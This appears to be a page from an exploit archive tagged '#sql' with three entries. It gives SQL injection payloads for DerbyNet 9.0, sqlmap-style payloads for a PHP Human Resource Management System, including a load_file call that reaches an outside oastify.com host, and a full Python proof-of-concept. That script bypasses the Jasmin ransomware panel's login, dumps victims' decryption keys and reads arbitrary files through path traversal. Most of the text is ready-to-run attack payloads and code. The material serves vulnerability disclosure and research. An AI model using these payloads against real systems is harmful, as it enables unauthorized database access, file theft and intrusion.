    CVE ID: CVE-2024-30928Description:An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, particularly within the `ajax/query.slide.next.inc` file. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting the unvalidated `classids` parameter used in constructing SQL queries. This parameter is not properly sanitized before being included in the SQL statement, leading to a critical risk of SQL Injection.Vulnerability Type: SQL InjectionVendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: ajax/query.slide.next.incAttack Type: RemoteImpacts:- Code execution: True- Information Disclosure: TrueAttack Vectors:The vulnerability is primarily exploited by manipulating the `classids` parameter in the user's request to the `ajax/query.slide.next.inc` file. The lack of adequate input validation allows attackers to inject malicious SQL code through this parameter. Example attack vectors include:- Direct exploitation:- `http://127.0.0.1:8000/action.php?query=slide.next&mode=racer&classids=1`- Boolean-based blind SQL Injection:- Payload: `query=slide.next&mode=racer&classids=1) AND 4365=4365 AND (6880=6880`- UNION query SQL Injection:- Payload: `query=slide.next&mode=racer&classids=-3890) UNION ALL SELECT NULL,NULL,CHAR(113,107,120,122,113)||CHAR(79,97,117,85,112,79,82,85,75,114,65,66,118,100,117,107,79,118,111,104,67,105,87,86,72,110,107,119,113,86,106,107,115,100,110,109,98,77,85,115)||CHAR(113,118,120,120,113),NULL,NULL,NULL,NULL,NULL-- rDzQ`These vectors demonstrate how an attacker could manipulate SQL queries to potentially access or manipulate database information unauthorizedly.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 ajax/query.slide.next.inc SQL Injection

Human Resource Management System 2024 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: hrm2024.1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/02/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The cityedit parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'was submitted in the cityedit parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: cityedit (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(selectload_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''ELSE 0x28 END)) AND 'GMzs'='GMzs    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT(ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK    Type: time-based blind    Title: MySQL > 5.0.12 AND time-based blind (heavy query)    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR1) AND 'Jtnd'='Jtnd---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/hrm-2024.1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/hrm202410-multiple-sqli.html)## Time spent:01:15:00

Human Resource Management System 2024 1.0 SQL Injection

Jasmin Ransomware version 1.1 suffers from an arbitrary file read vulnerability.

    # Exploit Title: Jasmin Ransomware arbitrary file read# Date: 2024-04-04# Exploit Author: @_chebuya# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware# Version: v1.1# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30851# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/mainimport requestsimport argparseimport osfrom bs4 import BeautifulSoupdef get_file(jasmin_url, filepath):    response = requests.get(        f'{jasmin_url}/download_file.php?file={filepath}',        allow_redirects=False    )    return response.textdef get_keys(jasmin_url):    headers = {        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',    }    data = "username=&password='+or+1%3D1+--+-&service=login"    login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)    cookies = login_req.cookies    list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)    soup = BeautifulSoup(list_req.text, 'html.parser')    rows = soup.find_all('tr')    print(f"Dumping decryption keys from {len(rows)-1} victims")    for row in rows:        data = row.find_all('td')        if len(data) == 0:            continue                username = data[1].get_text()        hostname = data[0].get_text()        filepath = data[7].find('a')['href'].split("=")[1]        print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")subparser = parser.add_subparsers(dest='subcommand')file_parser = subparser.add_parser("getfile", help="Read a file off the server")file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")args = parser.parse_args()if args.subcommand != None:    target_url = args.url.rstrip("/")if args.subcommand == "getkeys":    get_keys(target_url)elif args.subcommand == "getfile":    target_file = args.file.replace("\\", "/").replace("c:", "")    target_path = os.path.join("../../../../../../../../../", target_file)    print(get_file(target_url, target_path))else:    parser.print_help()

Tag

#sql